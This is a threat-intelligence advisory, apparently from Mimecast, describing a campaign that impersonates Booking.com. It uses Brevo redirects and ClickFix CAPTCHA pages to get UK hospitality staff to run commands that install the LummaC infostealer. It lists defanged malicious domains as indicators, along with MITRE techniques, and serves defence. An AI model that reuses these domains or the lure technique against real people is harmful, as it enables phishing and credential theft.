Mimecast Logo
M365 Threat Scan Get a Quote

    Impersonating Booking.com

    24 February 2025

    Key Points

    What you'll learn in this notification

    • Targeting hospitality sector predominately in the UK
    • Operation employs the “Clickfix” technique to enhance its effectiveness
    • Malware associated with these campaigns has been identified as LummaC, a popular infostealer

    Mimecast Threat Researchers have observed a malware campaign using Sendinblue (now Brevo) for distribution. Brevo is an all-in-one marketing platform offering email, SMS, automation, and CRM tools for customer engagement. The campaigns focus on using lures related to booking issues to fool users into clicking links appearing to be from booking.com. However, these links use the Sendinblue/Brevo redirect service to track clicks and redirect to malicious sites owned by the threat operation. With most users accessing personal websites on corporate devices, it becomes important to highlight how personal services are being used to target corporate devices.



    TI-notification-booking.com-01.webp TI-notification-booking.com-02.webp


    Once redirected, the user sees the CAPTCHA page below which contains instruction to copy and paste commands to the clipboard as part of a verification step to be used in the command prompt.



    TI-notification-booking.com-03.webp


    Once the user runs the command, an infostealer will be downloaded, in this case LummaC was the malware identified, which usually targets credentials, browser data, and cryptocurrency wallets.

    This campaign, using Brevo as a distribution and redirection method, was first observed in early January with low volumes and picked up significantly in mid and late January. As the targets were hotels, hotel chains, resorts, etc., this aligns with people booking their holidays for the forthcoming year early to be prepared.



    TI-notification-booking.com-04.webp

    Mimecast Protection

    We have identified several attributes in the campaigns which have been added to our detection capabilities.



    Targeting: 

    UK, Hospitality sector



    IOCs:

    URL’s
    admin-booking-service[.]com
    adminbokingcapha64578[.]com
    booking[.]parner-id-010101743[.]com
    commentsvisitor58100[.]world
    commentsvisitor589360[.]world
    concernguest68549[.]com
    concernguest74549[.]com
    feedbackguest485100[.]world
    feedbackguest485121[.]world
    feedbackguest48594821[.]world
    feedbackguest84560[.]world
    feedbackpage91293[.]world
    issueguest423239[.]world
    issueguest495139[.]world
    parner-id-010101743[.]com
    parner-id1501202500[.]com
    reportguest4893921[.]world
    reportguest4895921[.]world
    roomsattendes999923[.]world
    roomsvisitor9934224[.]world



    Tactic Techniques and Procedures

    T1566.002: Phishing: Spear phishing Link
    T1585.002: Establish Accounts: Email Accounts
    T1204.002: User Execution: Malicious File
    T1059.003: Command and Scripting Interpreter: Windows Command Shell
    T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    T1027: Obfuscated Files or Information
    T1202: Indirect Command Execution
    T1555: Credentials from Password Stores
    T1083: File and Directory Discovery
    T1518.001: Software Discovery: Security Software Discovery
    T1113: Screen Capture



    Recommendations

    • Ensure you have URL Protect policy is set to protect the organization.
    • Search through your email receipt logs to determine if any of file hashes have been delivered to your users. 
    • Educate end users on avoiding running commands within a command prompt.

     

    Back to Top